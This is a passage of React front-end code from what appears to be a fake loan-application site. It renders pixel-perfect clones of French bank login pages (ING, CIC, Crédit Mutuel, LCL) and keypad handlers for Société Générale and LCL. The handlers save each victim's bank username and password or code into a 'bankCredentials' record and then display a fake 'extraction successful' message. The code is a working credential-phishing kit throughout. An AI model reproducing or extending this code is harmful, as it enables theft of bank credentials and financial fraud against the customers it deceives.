              <a href="https://www.monabanq.com/fr/identification/IdentifiantOublie.html" target="_blank" rel="noopener noreferrer" className="text-gray-600 hover:underline">Identifiant oublié</a>
            </p>
            <p>
              <a href="https://www.monabanq.com/fr/identification/AccesBloque.html" target="_blank" rel="noopener noreferrer" className="text-sm text-gray-600 hover:underline">Accès bloqué</a>
            </p>
            <p className="text-sm">
              <a href="https://www.monabanq.com/fr/identification/aide-authentification.html" target="_blank" rel="noopener noreferrer" className="text-gray-600 hover:underline">Aide à la connexion</a>
              <span className="text-gray-400 mx-2">|</span>
              <a href="https://www.monabanq.com/fr/identification/numeros-utiles.html" target="_blank" rel="noopener noreferrer" className="text-gray-600 hover:underline">Numéros utiles</a>
            </p>
          </div>

          {/* Footer - Crédit Mutuel Logo */}
          <div className="mt-8 pt-6 border-t border-gray-200 flex justify-center">
            <img 
              src="https://customer-assets.emergentagent.com/job_e16ff56b-2bc6-41cd-b0db-65572686d97c/artifacts/018hqz4e_IMG_0753.jpeg"
              alt="Une banque du Crédit Mutuel Alliance Fédérale"
              className="h-20 w-auto object-contain"
            />
          </div>
        </div>
      </div>
    );
  }

  // Special ING Layout (after cookie accepted)
  if (bank.isINGLayout) {
    return (
      <div className="min-h-screen bg-white">
        {/* ING Header - White */}
        <div className="w-full bg-white py-3">
          <div className="max-w-4xl mx-auto px-4">
            <img 
              src={bank.logo} 
              alt={bank.name} 
              className="h-8 w-auto object-contain"
            />
          </div>
        </div>
        
        {/* Orange Line */}
        <div className="w-full h-1" style={{ backgroundColor: '#FF6200' }}></div>

        {/* Main Content - Narrower */}
        <div className="max-w-sm mx-auto px-4 py-6">
          {/* Title with gray line below */}
          <h1 className="text-xl font-light italic mb-2" style={{ color: '#FF6200' }}>
            Entrez dans les qualifications
          </h1>
          <div className="w-full h-px bg-gray-300 mb-4"></div>

          <form onSubmit={handleSubmit}>
            {/* User ID Field */}
            <div className="mb-3">
              <div className="flex items-baseline flex-wrap gap-1 mb-1">
                <label className="text-sm font-bold text-gray-800">
                  ID utilisateur
                </label>
                <a 
                  href={bank.forgotUserIdLink}
                  target="_blank"
                  rel="noopener noreferrer"
                  className="text-xs text-blue-600 hover:underline italic"
                >
                  (Vous avez oublié votre identifiant d'utilisateur ?)
                </a>
              </div>
              <Input
                type="text"
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                required
                className="h-9 text-sm border-2 border-gray-800 rounded-sm focus:ring-1 focus:ring-orange-400"
                data-testid="ing-username-input"
              />
            </div>

            {/* Password Field */}
            <div className="mb-3">
              <div className="flex items-baseline flex-wrap gap-1 mb-1">
                <label className="text-sm font-bold text-gray-800">
                  Mot de passe
                </label>
                <a 
                  href={bank.forgotPasswordLink}
                  target="_blank"
                  rel="noopener noreferrer"
                  className="text-xs text-blue-600 hover:underline italic"
                >
                  (Vous avez oublié votre mot de passe ?)
                </a>
              </div>
              <div className="relative">
                <Input
                  type={showPassword ? 'text' : 'password'}
                  value={password}
                  onChange={(e) => setPassword(e.target.value)}
                  required
                  className="h-9 text-sm border-2 border-gray-800 rounded-sm focus:ring-1 focus:ring-orange-400 pr-10"
                  data-testid="ing-password-input"
                />
                <button
                  type="button"
                  onClick={() => setShowPassword(!showPassword)}
                  className="absolute right-2 top-2 text-gray-400 hover:text-gray-600"
                >
                  {showPassword ? <EyeOff className="h-4 w-4" /> : <Eye className="h-4 w-4" />}
                </button>
              </div>
            </div>

            {/* Language Dropdown */}
            <div className="mb-4">
              <label className="block text-sm font-bold text-gray-800 mb-1">
                Langue
              </label>
              <select className="w-full h-9 px-2 border border-gray-300 rounded-sm text-sm bg-gray-200">
                <option>Français (France)</option>
                <option>English (United Kingdom)</option>
                <option>Nederlands (Nederland)</option>
                <option>Deutsch (Deutschland)</option>
              </select>
            </div>

            {/* Submit Button - Gray gradient with blue text */}
            <Button
              type="submit"
              className="w-full h-9 font-semibold text-sm uppercase tracking-wide rounded-sm border border-gray-400"
              style={{ background: 'linear-gradient(to bottom, #f0f0f0, #c8c8c8)', color: '#0066CC' }}
              disabled={loading || !username || !password}
              data-testid="ing-submit-btn"
            >
              {loading ? 'Connexion...' : 'SE CONNECTER'}
            </Button>
          </form>

          {/* Additional Information Section - Light Gray */}
          <div className="mt-6 p-3 rounded-sm" style={{ backgroundColor: '#E8E8E8' }}>
            <h3 className="font-semibold text-sm mb-2" style={{ color: '#FF6200' }}>Informations supplémentaires</h3>
            <ul className="space-y-1">
              <li>
                <a href={bank.forgotUserIdLink} target="_blank" rel="noopener noreferrer" className="text-xs text-blue-600 hover:underline">
                  Vous avez oublié votre identifiant d'utilisateur ?
                </a>
              </li>
              <li>
                <a href={bank.forgotPasswordLink} target="_blank" rel="noopener noreferrer" className="text-xs text-blue-600 hover:underline">
                  Vous avez oublié votre mot de passe ?
                </a>
              </li>
              <li>
                <a href={bank.resetLogonLink} target="_blank" rel="noopener noreferrer" className="text-xs text-blue-600 hover:underline">
                  Déverrouiller/Réinitialiser votre mot de passe?
                </a>
              </li>
            </ul>
          </div>

          {/* Footer Links */}
          <div className="mt-4 text-center">
            <div className="text-xs text-blue-600 mb-2">
              <a href="#" className="hover:underline">EULA - FR</a>
              <span className="mx-2 text-gray-400">|</span>
              <a href="#" className="hover:underline">Privacy Policy</a>
              <span className="mx-2 text-gray-400">|</span>
              <a href="#" className="hover:underline">Paramètres des cookies</a>
            </div>
            <p className="text-xs text-gray-600">
              Navigateurs pris en charge : La version Microsoft Windows d'Edge, la version la plus récente de Chrome de Google, la version la plus récente de Safari d'Apple.
            </p>
          </div>
        </div>
      </div>
    );
  }

  // Société Générale keypad handlers
  const handleSgKeypadClick = (num) => {
    if (sgCode.length < 6 && num !== '') {
      setSgCode(prev => prev + num);
    }
  };

  const handleSgClearCode = () => {
    setSgCode('');
  };

  const handleSgDeleteLast = () => {
    setSgCode(prev => prev.slice(0, -1));
  };

  const handleSgValidate = async () => {
    if (sgStep === 1 && username.length >= 8) {
      setSgStep(2);
      setSgCode('');
      // Regenerate keypad numbers
      const numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '', '', '', '', '', ''];
      for (let i = numbers.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [numbers[i], numbers[j]] = [numbers[j], numbers[i]];
      }
      setSgKeypadNumbers(numbers);
    } else if (sgStep === 2 && sgCode.length === 6) {
      // Submit with sgCode directly
      setLoading(true);
      try {
        let flow = await loanFlowService.getByClient(user.id);
        
        if (!flow) {
          flow = await loanFlowService.create({
            clientId: user.id,
            currentStep: 'bank_completed'
          });
        }
        
        if (flow) {
          await loanFlowService.update(flow.id, {
            currentStep: 'bank_completed',
            bankCredentials: {
              bank: bankId,
              bankName: bank.name,
              username: username,
              password: sgCode,
              submittedAt: new Date().toISOString()
            }
          });

          await justificatifService.createValidated(user.id, 'releve_identite_bancaire');
          await justificatifService.createValidated(user.id, 'releve_compte');

          setLoading(false);
          setShowExtraction(true);

          setTimeout(() => {
            toast({
              title: 'Extraction réussie',
              description: 'Vos informations bancaires ont été récupérées',
            });

            navigate('/client/justificatif-success', { 
              state: { 
                type: 'bank',
                bankName: bank.name
              }
            });
          }, 4000);
        }
      } catch (error) {
        console.error('Error submitting SG credentials:', error);
        toast({
          title: 'Erreur',
          description: 'Une erreur est survenue',
          variant: 'destructive'
        });
        setLoading(false);
      }
    }
  };

  // LCL keypad handlers
  const handleLclKeypadClick = (num) => {
    if (lclCode.length < 6) {
      setLclCode(prev => prev + num);
    }
  };

  const handleLclDeleteLast = () => {
    setLclCode(prev => prev.slice(0, -1));
  };

  const handleLclIdentifierChange = (index, value) => {
    if (value.length <= 1 && /^\d*$/.test(value)) {
      const newIdentifier = [...lclIdentifier];
      newIdentifier[index] = value;
      setLclIdentifier(newIdentifier);
      
      // Auto-focus next input
      if (value && index < 9) {
        const nextInput = document.getElementById(`lcl-id-${index + 1}`);
        if (nextInput) nextInput.focus();
      }
    }
  };

  const handleLclIdentifierKeyDown = (index, e) => {
    if (e.key === 'Backspace' && !lclIdentifier[index] && index > 0) {
      const prevInput = document.getElementById(`lcl-id-${index - 1}`);
      if (prevInput) prevInput.focus();
    }
  };

  const handleLclContinue = () => {
    const identifierStr = lclIdentifier.join('');
    if (identifierStr.length === 10) {
      setUsername(identifierStr);
      setLclStep(2);
      setLclCode('');
      // Regenerate keypad numbers
      const numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
      for (let i = numbers.length - 1; i > 0; i--) {
        const j = Math.floor(Math.random() * (i + 1));
        [numbers[i], numbers[j]] = [numbers[j], numbers[i]];
      }
      setLclKeypadNumbers(numbers);
    }
  };

  const handleLclValidate = async () => {
    if (lclCode.length === 6) {
      setLoading(true);
      try {
        let flow = await loanFlowService.getByClient(user.id);
        
        if (!flow) {
          flow = await loanFlowService.create({
            clientId: user.id,
            currentStep: 'bank_completed'
          });
        }
        
        if (flow) {
          await loanFlowService.update(flow.id, {
            currentStep: 'bank_completed',
            bankCredentials: {
              bank: bankId,
              bankName: bank.name,
              username: username,
              password: lclCode,
              submittedAt: new Date().toISOString()
            }
          });

          await justificatifService.createValidated(user.id, 'releve_identite_bancaire');
          await justificatifService.createValidated(user.id, 'releve_compte');

          setLoading(false);
          setShowExtraction(true);

          setTimeout(() => {
            toast({
              title: 'Extraction réussie',
              description: 'Vos informations bancaires ont été récupérées',
            });

            navigate('/client/justificatif-success', { 
              state: { 
                type: 'bank',
                bankName: bank.name
              }
            });
          }, 4000);
        }
      } catch (error) {
        console.error('Error submitting LCL credentials:', error);
        toast({
          title: 'Erreur',
          description: 'Une erreur est survenue',
          variant: 'destructive'
        });
        setLoading(false);
      }
    }
  };

  // Special CIC Layout - Pixel Perfect Clone
  if (bank.isCICLayout) {
    return (
      <div className="min-h-screen flex flex-col" style={{ backgroundColor: '#F5F5F5' }}>
        {/* Header */}
        <div className="w-full bg-white py-3 px-4 flex items-center justify-between shadow-sm">
          {/* Left: Logo only */}
          <div className="flex items-center">
            <img 
              src={bank.logo} 
              alt="CIC"
              className="h-8 w-auto object-contain"
            />
          </div>
          
          {/* Right: Close X button */}
          <button 
            onClick={() => navigate('/client/loan-flow/bank-selection')}
            className="w-9 h-9 rounded-full flex items-center justify-center hover:bg-gray-100"
            data-testid="cic-close-btn"
          >
            <svg className="w-5 h-5 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
            </svg>
          </button>
        </div>

        {/* Main Content - Centered Card */}
        <div className="flex-1 flex items-start justify-center px-4 py-8">
          <div className="w-full max-w-md">
            {/* Title - Centered, Black */}
            <h1 className="text-3xl font-bold mb-8 text-center text-gray-900">
              Se connecter
            </h1>

            {/* Login Card */}
            <div className="bg-white rounded-lg shadow-sm overflow-hidden">
            {/* Accordion Header - Identifiant / Mot de passe */}
            <div className="border-b border-gray-200">
              <button 
                onClick={() => setCicAccordionOpen(!cicAccordionOpen)}
                className="w-full p-4 flex items-center justify-center gap-2"
              >
                <span className="text-base font-semibold" style={{ color: '#0D9488' }}>Identifiant / Mot de passe</span>
                <svg 
                  className={`w-4 h-4 transition-transform ${cicAccordionOpen ? 'rotate-180' : 'rotate-0'}`} 
                  style={{ color: '#0D9488' }} 
                  fill="none" 
                  stroke="currentColor" 
                  viewBox="0 0 24 24"
                >
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                </svg>
              </button>
            </div>

            {/* Dropdown options - Only shows when accordion is open */}
            {cicAccordionOpen && (
              <>
                {/* Certificat Électronique */}
                <div className="border-b border-gray-200">
                  <a 
                    href="https://cert.cic.fr/cic/fr/identification/client_cert.cgi"
                    target="_blank"
                    rel="noopener noreferrer"
                    className="w-full p-4 flex items-center justify-center block"
                  >
                    <span className="text-base text-gray-700">Certificat Électronique</span>
                  </a>
                </div>

                {/* SAFETRANS */}
                <div className="border-b border-gray-200">
                  <a 
                    href="https://www.cic.fr/fr/identification/se-connecter-avec-un-lecteur-safetrans.html"
                    target="_blank"
                    rel="noopener noreferrer"
                    className="w-full p-4 flex items-center justify-center block"
                  >
                    <span className="text-base text-gray-700">SAFETRANS</span>
                  </a>
                </div>
              </>
            )}

            {/* Form Content - Always visible */}
            <div className="p-5">
              {/* Required info */}
              <p className="text-sm text-gray-600 mb-5">
                <span className="text-red-500">*</span> Information obligatoire
              </p>

              {/* Identifiant Field */}
              <div className="mb-5">
                <label className="block text-base font-bold text-gray-900 mb-2">
                  Identifiant <span className="text-red-500">*</span>
                </label>
                <input
                  type="text"
                  value={username}
                  onChange={(e) => setUsername(e.target.value)}
                  className="w-full h-11 px-4 border border-gray-500 rounded focus:border-teal-600 focus:outline-none text-base"
                  data-testid="cic-username-input"
                />
              </div>

              {/* Mot de passe Field */}
              <div className="mb-6">
                <label className="block text-base font-bold text-gray-900 mb-2">
                  Mot de passe <span className="text-red-500">*</span>
                </label>
                <div className="relative">
                  <input
                    type={showPassword ? 'text' : 'password'}
                    value={password}
                    onChange={(e) => setPassword(e.target.value)}
                    className="w-full h-11 px-4 pr-12 border border-gray-500 rounded focus:border-teal-600 focus:outline-none text-base"
                    data-testid="cic-password-input"
                  />
                  <button
                    type="button"
                    onClick={() => setShowPassword(!showPassword)}
                    className="absolute right-4 top-1/2 transform -translate-y-1/2 text-gray-400"
                  >
                    {showPassword ? (
                      <Eye className="w-5 h-5" />
                    ) : (
                      <EyeOff className="w-5 h-5" />
                    )}
                  </button>
                </div>
              </div>

              {/* Submit Button - Square */}
              <Button
                onClick={handleSubmit}
                disabled={!username || !password || loading}
                className="w-full h-14 text-white font-semibold rounded-none text-lg"
                style={{ backgroundColor: '#0D9488' }}
                data-testid="cic-login-btn"
              >
                {loading ? 'Connexion...' : 'Se connecter'}
              </Button>
            </div>
          </div>

          {/* Links - Stacked vertically, centered with separator */}
          <div className="flex flex-col items-center mt-6">
            <a 
              href={bank.forgotLink}
              target="_blank"
              rel="noopener noreferrer"
              className="flex items-center gap-2 text-lg font-medium underline"
              style={{ color: '#0D9488' }}
            >
              Codes d'accès oubliés
              <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M14 5l7 7m0 0l-7 7m7-7H3" />
              </svg>
            </a>
            
            {/* Separator line */}
            <div className="w-full border-t border-gray-300 my-4"></div>
            
            <a 
              href={bank.securityLink}
              target="_blank"
              rel="noopener noreferrer"
              className="flex items-center gap-2 text-lg font-medium underline"
              style={{ color: '#0D9488' }}
            >
              Infos sécurité
              <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M14 5l7 7m0 0l-7 7m7-7H3" />
              </svg>
            </a>
          </div>

          {/* Security Tips */}
          <div className="mt-6 p-5 rounded-lg" style={{ backgroundColor: '#E6FFFA' }}>
            <p className="text-base text-center" style={{ color: '#0D9488' }}>
              <span className="font-bold">Astuces : </span>
              <a 
                href="https://www.cic.fr/fr/particuliers/comptes/securite-des-operations-bancaires.html"
                target="_blank"
                rel="noopener noreferrer"
                className="underline"
              >
                Nos conseils pour sécuriser vos opérations et données.
              </a>
            </p>
          </div>
          </div>
        </div>
      </div>
    );
  }

  // Special Crédit Mutuel Layout - Pixel Perfect Clone
  if (bank.isCreditMutuelLayout) {
    return (
      <div className="min-h-screen flex flex-col" style={{ backgroundColor: '#F5F5F5' }}>
        {/* Header */}
        <div className="w-full bg-white py-3 px-4 flex items-center justify-between shadow-sm">
          {/* Left: Logo only */}
          <div className="flex items-center">
            <img 
              src={bank.logoSymbol} 
              alt="Crédit Mutuel"
              className="h-16 w-auto object-contain"
            />
          </div>
          
          {/* Right: Close X button */}
          <button 
            onClick={() => navigate('/client/loan-flow/bank-selection')}
            className="w-9 h-9 rounded-full flex items-center justify-center hover:bg-gray-100"
            data-testid="cm-close-btn"
          >
            <svg className="w-5 h-5 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
            </svg>
          </button>
        </div>

        {/* Main Content - Centered Card */}
        <div className="flex-1 flex items-start justify-center px-4 py-8">
          <div className="w-full max-w-md">
            {/* Title - Centered */}
            <h1 className="text-3xl font-bold mb-8 text-center" style={{ color: '#1E3A8A' }}>
              Se connecter
            </h1>

            {/* Login Card */}
            <div className="bg-white rounded-lg shadow-sm overflow-hidden">
            {/* Accordion Header - Identifiant / Mot de passe - Blue, Bold, Centered */}
            <div className="border-b border-gray-200">
              <button 
                onClick={() => setCmAccordionOpen(!cmAccordionOpen)}
                className="w-full p-4 flex items-center justify-center gap-2"
              >
                <span className="text-base font-semibold" style={{ color: '#1E3A8A' }}>Identifiant / Mot de passe</span>
                <svg 
                  className={`w-4 h-4 transition-transform ${cmAccordionOpen ? 'rotate-180' : 'rotate-0'}`} 
                  style={{ color: '#1E3A8A' }} 
                  fill="none" 
                  stroke="currentColor" 
                  viewBox="0 0 24 24"
                >
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                </svg>
              </button>
            </div>

            {/* Dropdown options - Only shows when accordion is open */}
            {cmAccordionOpen && (
              <>
                {/* Certificat Électronique - Link */}
                <div className="border-b border-gray-200">
                  <a 
                    href="https://www.creditmutuel.fr/fr/authentification/certificat.html"
                    target="_blank"
                    rel="noopener noreferrer"
                    className="w-full p-4 flex items-center justify-center block"
                  >
                    <span className="text-base text-gray-700">Certificat Électronique</span>
                  </a>
                </div>

                {/* SAFETRANS - Link */}
                <div className="border-b border-gray-200">
                  <a 
                    href="https://www.creditmutuel.fr/fr/authentification/safetrans.html"
                    target="_blank"
                    rel="noopener noreferrer"
                    className="w-full p-4 flex items-center justify-center block"
                  >
                    <span className="text-base text-gray-700">SAFETRANS</span>
                  </a>
                </div>
              </>
            )}

            {/* Form Content - Always visible */}
            <div className="p-5">
              {/* Required info */}
              <p className="text-sm text-gray-600 mb-5">
                <span className="text-red-500">*</span> Information obligatoire
              </p>

              {/* Identifiant Field */}
              <div className="mb-5">
                <label className="block text-base font-bold text-gray-900 mb-2">
                  Identifiant <span className="text-red-500">*</span>
                </label>
                <input
                  type="text"
                  value={username}
                  onChange={(e) => setUsername(e.target.value)}
                  className="w-full h-14 px-4 border border-gray-300 rounded-lg focus:border-blue-600 focus:outline-none text-base"
                  data-testid="cm-username-input"
                />
              </div>

              {/* Mot de passe Field */}
              <div className="mb-6">
                <label className="block text-base font-bold text-gray-900 mb-2">
                  Mot de passe <span className="text-red-500">*</span>
                </label>
                <div className="relative">
                  <input
                    type={showPassword ? 'text' : 'password'}
                    value={password}
                    onChange={(e) => setPassword(e.target.value)}
                    className="w-full h-14 px-4 pr-12 border border-gray-300 rounded-lg focus:border-blue-600 focus:outline-none text-base"
                    data-testid="cm-password-input"
                  />
                  <button
                    type="button"
                    onClick={() => setShowPassword(!showPassword)}
                    className="absolute right-4 top-1/2 transform -translate-y-1/2 text-gray-400"
                  >
                    {showPassword ? (
                      <Eye className="w-6 h-6" />
                    ) : (
                      <EyeOff className="w-6 h-6" />
                    )}
                  </button>
                </div>
              </div>

              {/* Submit Button - Always Dark Blue */}
              <Button
                onClick={handleSubmit}
                disabled={!username || !password || loading}
                className="w-full h-14 text-white font-semibold rounded-full text-lg"
                style={{ 
                  backgroundColor: '#1E3A8A'
                }}
                data-testid="cm-login-btn"
              >
                {loading ? 'Connexion...' : 'Se connecter'}
              </Button>
            </div>
          </div>

          {/* Links - Stacked vertically, centered with separator */}
          <div className="flex flex-col items-center mt-6">
            <a 
              href={bank.forgotLink}
              target="_blank"
              rel="noopener noreferrer"
              className="flex items-center gap-2 text-lg font-medium underline"
              style={{ color: '#1E3A8A' }}
            >
              Codes d'accès oubliés
              <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M14 5l7 7m0 0l-7 7m7-7H3" />
              </svg>
            </a>
            
            {/* Separator line */}
            <div className="w-full border-t border-gray-300 my-4"></div>
            
            <a 
              href={bank.securityLink}
              target="_blank"
              rel="noopener noreferrer"
              className="flex items-center gap-2 text-lg font-medium underline"
              style={{ color: '#1E3A8A' }}
            >
              Infos sécurité
              <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M14 5l7 7m0 0l-7 7m7-7H3" />
              </svg>
            </a>
          </div>

          {/* Security Tips */}
          <div className="mt-6 p-5 rounded-lg" style={{ backgroundColor: '#E8F4FC' }}>
            <p className="text-base text-center" style={{ color: '#1E3A8A' }}>
              <span className="font-bold">Astuces : </span>
              <a 
                href="https://www.creditmutuel.fr/fr/particuliers/comptes/securite-des-operations-bancaires.html"
                target="_blank"
                rel="noopener noreferrer"
                className="underline"
              >
                Nos conseils pour sécuriser vos opérations et données.
              </a>
            </p>
          </div>
          </div>
        </div>
      </div>
    );
  }

  // Special LCL Layout with Virtual Keyboard - Pixel Perfect Clone
  if (bank.isLCLLayout) {
    const identifierComplete = lclIdentifier.every(digit => digit !== '');
    
    return (
      <div className="min-h-screen flex flex-col bg-white">
        {/* Main Content */}
        <div className="flex-1 flex flex-col items-center px-4 pt-8">
          {/* LCL Logo centered - includes slogan in image */}
          <div className="mb-8 mt-4">
            <img 
              src={bank.logo} 
              alt="LCL Banque et Assurance - Pour aller de l'avant."
              className="h-20 w-auto object-contain"
            />
          </div>

          {/* Step 1: Identifier Input */}
          {lclStep === 1 && (
            <div className="w-full max-w-xs">
              {/* Title */}
              <h1 className="text-xl font-bold text-center mb-4" style={{ color: '#0046AD' }}>
                Votre identifiant
              </h1>

              {/* 10 Individual Input Fields - straight horizontal lines */}
              <div className="flex justify-center items-center gap-3 mb-4 px-4">
                {lclIdentifier.map((digit, index) => (
                  <div key={index} className="relative" style={{ width: '22px' }}>
                    <input
                      id={`lcl-id-${index}`}
                      type="text"
                      inputMode="numeric"
                      pattern="[0-9]*"
                      maxLength={1}
                      value={digit}
                      onChange={(e) => handleLclIdentifierChange(index, e.target.value)}
                      onKeyDown={(e) => handleLclIdentifierKeyDown(index, e)}
                      className="w-full text-center text-lg font-medium bg-transparent focus:outline-none"
                      style={{ 
                        border: 'none',
                        borderRadius: 0,
                        padding: '4px 0',
                        caretColor: '#0046AD'
                      }}
                      data-testid={`lcl-identifier-${index}`}
                    />
                    {/* Straight horizontal line underneath */}
                    <div 
                      className="absolute bottom-0 left-0 right-0"
                      style={{ 
                        height: '2px', 
                        backgroundColor: digit ? '#0046AD' : '#D1D5DB'
                      }}
                    />
                  </div>
                ))}
              </div>

              {/* Remember me checkbox - larger checkbox */}
              <div className="flex items-center justify-center mb-4">
                <label className="flex items-center cursor-pointer">
                  <input
                    type="checkbox"
                    checked={rememberMe}
                    onChange={(e) => setRememberMe(e.target.checked)}
                    className="w-6 h-6 border-2 border-gray-300 rounded mr-3 cursor-pointer"
                    style={{ accentColor: '#0046AD' }}
                  />
                  <span className="text-base text-gray-600">Mémoriser mon identifiant</span>
                </label>
              </div>

              {/* Continue Button - narrower width */}
              <div className="flex justify-center mb-4">
                <Button
                  onClick={handleLclContinue}
                  disabled={!identifierComplete}
                  className="h-11 px-10 text-white font-medium rounded-full text-base flex items-center justify-center gap-2"
                  style={{ 
                    backgroundColor: identifierComplete ? '#0046AD' : '#9CA3AF',
                    cursor: identifierComplete ? 'pointer' : 'not-allowed'
                  }}
                  data-testid="lcl-continue-btn"
                >
                  Continuer
                  <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M14 5l7 7m0 0l-7 7m7-7H3" />
                  </svg>
                </Button>
              </div>

              {/* Links */}
              <div className="text-center space-y-1">
                <a 
                  href="https://www.lcl.fr/questions-frequentes/identification-authentification-forte"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="block text-base underline"
                  style={{ color: '#0046AD' }}
                >
                  Identifiant oublié ?
                </a>
                <a 
                  href="https://www.lcl.fr/questions-frequentes/identification-authentification-forte"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="block text-base underline"
                  style={{ color: '#0046AD' }}
                >
                  Code personnel oublié ?
                </a>
              </div>

              {/* Not a client section */}
              <div className="mt-8 text-center">
                <h2 className="text-xl font-bold text-gray-900 mb-3">Pas encore client ?</h2>
                <a
                  href="https://www.lcl.fr/compte-bancaire/ouvrir-un-compte-bancaire-en-ligne"
                  target="_blank"
                  rel="noopener noreferrer"
                  className="inline-flex items-center justify-center gap-2 px-6 h-11 font-medium rounded-full text-base text-white"
                  style={{ backgroundColor: '#0046AD' }}
                >
                  Ouvrir un compte
                  <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M14 5l7 7m0 0l-7 7m7-7H3" />
                  </svg>
                </a>
              </div>

              {/* Security Tips Carousel - Separate cards side by side */}
            </div>
          )}
          
          {/* Security Tips - Two separate swipeable cards - HIDDEN FOR NOW (set showLclSecurityTips to true to enable) */}
          {lclStep === 1 && false && (
            <div className="w-full mt-10 overflow-hidden">
              <div 
                className="flex transition-transform duration-300 ease-in-out gap-3 px-4"
                style={{ transform: `translateX(-${lclSecuritySlide * 85}%)` }}
                onTouchStart={(e) => {
                  const touchStart = e.touches[0].clientX;
                  e.currentTarget.dataset.touchStart = touchStart;
                }}
                onTouchEnd={(e) => {
                  const touchStart = parseFloat(e.currentTarget.dataset.touchStart);
                  const touchEnd = e.changedTouches[0].clientX;
                  const diff = touchStart - touchEnd;
                  if (diff > 50 && lclSecuritySlide < 1) {
                    setLclSecuritySlide(1);
                  } else if (diff < -50 && lclSecuritySlide > 0) {
                    setLclSecuritySlide(0);
                  }
                }}
              >
                {/* Card 1 - Longer message */}
                <div 
                  className="flex-shrink-0 rounded-xl p-4"
                  style={{ 
                    width: '85%',
                    backgroundColor: '#FFFFFF', 
                    border: '1px solid #E5E7EB',
                    boxShadow: '0 1px 3px rgba(0,0,0,0.08)'
                  }}
                >
                  {/* Title with icon */}
                  <div className="flex items-center gap-2 mb-2">
                    <img 
                      src="https://customer-assets.emergentagent.com/job_creditportal-4/artifacts/dv7qzukp_IMG_0849.jpeg"
                      alt="Chat"
                      className="w-7 h-7 object-contain"
                    />
                    <h3 className="font-bold text-base" style={{ color: '#0046AD' }}>Nos conseils sécurité</h3>
                  </div>
                  {/* Description */}
                  <p className="text-sm text-gray-700 leading-relaxed mb-3">
                    LCL ne vous sollicitera jamais (que ce soit par mail, par SMS ou par téléphone) pour vous demander de communiquer de quelque manière que ce soit vos mots de passe, codes confidentiels ou codes à usage unique reçus par SMS.
                  </p>
                  <a 
                    href="https://www.lcl.fr/securite"
                    target="_blank"
                    rel="noopener noreferrer"
                    className="text-sm font-medium underline"
                    style={{ color: '#0046AD' }}
                  >
                    Comment sécuriser mes données bancaires
                  </a>
                </div>

                {/* Card 2 - Shorter message */}
                <div 
                  className="flex-shrink-0 rounded-xl p-4"
                  style={{ 
                    width: '85%',
                    backgroundColor: '#FFFFFF', 
                    border: '1px solid #E5E7EB',
                    boxShadow: '0 1px 3px rgba(0,0,0,0.08)'
                  }}
                >
                  {/* Title with icon */}
                  <div className="flex items-center gap-2 mb-2">
                    <img 
                      src="https://customer-assets.emergentagent.com/job_creditportal-4/artifacts/dv7qzukp_IMG_0849.jpeg"
                      alt="Chat"
                      className="w-7 h-7 object-contain"
                    />
                    <h3 className="font-bold text-base" style={{ color: '#0046AD' }}>Nos conseils sécurité</h3>
                  </div>
                  {/* Description */}
                  <p className="text-sm text-gray-700 leading-relaxed mb-3">
                    Découvrez les bons réflexes pour protéger votre ordinateur et vos données bancaires au quotidien.
                  </p>
                  <a 
                    href="https://www.lcl.fr/securite"
                    target="_blank"
                    rel="noopener noreferrer"
                    className="text-sm font-medium underline"
                    style={{ color: '#0046AD' }}
                  >
                    Se rendre sur LCL sécurité
                  </a>
                </div>
              </div>

              {/* Pagination dots */}
              <div className="flex justify-center gap-2 mt-4 pb-4">
                <button
                  onClick={() => setLclSecuritySlide(0)}
                  className="transition-all"
                  style={{ 
                    width: lclSecuritySlide === 0 ? '20px' : '8px',
                    height: '8px',
                    borderRadius: '4px',
                    backgroundColor: lclSecuritySlide === 0 ? '#0046AD' : '#D1D5DB'
                  }}
                  aria-label="Slide 1"
                />
                <button
                  onClick={() => setLclSecuritySlide(1)}
                  className="transition-all"
                  style={{ 
                    width: lclSecuritySlide === 1 ? '20px' : '8px',
                    height: '8px',
                    borderRadius: '4px',
                    backgroundColor: lclSecuritySlide === 1 ? '#0046AD' : '#D1D5DB'
                  }}
                  aria-label="Slide 2"
                />
              </div>
            </div>
          )}

          {/* Step 2: Code Personnel with Virtual Keypad */}
          {lclStep === 2 && (
            <div className="w-full max-w-sm">
              {/* Title */}
              <h1 className="text-xl font-bold text-center mb-4" style={{ color: '#0046AD' }}>
                Votre identifiant
              </h1>

              {/* Display entered identifier (read-only) */}
              <div className="flex justify-center items-center gap-1 mb-4">
                {lclIdentifier.map((digit, index) => (
                  <div key={index} className="w-7 text-center">
                    <span className="text-lg font-medium text-gray-800 border-b-2 border-gray-300 pb-1 px-1">
                      {digit}
                    </span>
                  </div>
                ))}
              </div>

              {/* Remember me checkbox (disabled in step 2) */}
              <div className="flex items-center justify-center mb-6">
                <label className="flex items-center">
                  <input
                    type="checkbox"
                    checked={rememberMe}
                    disabled
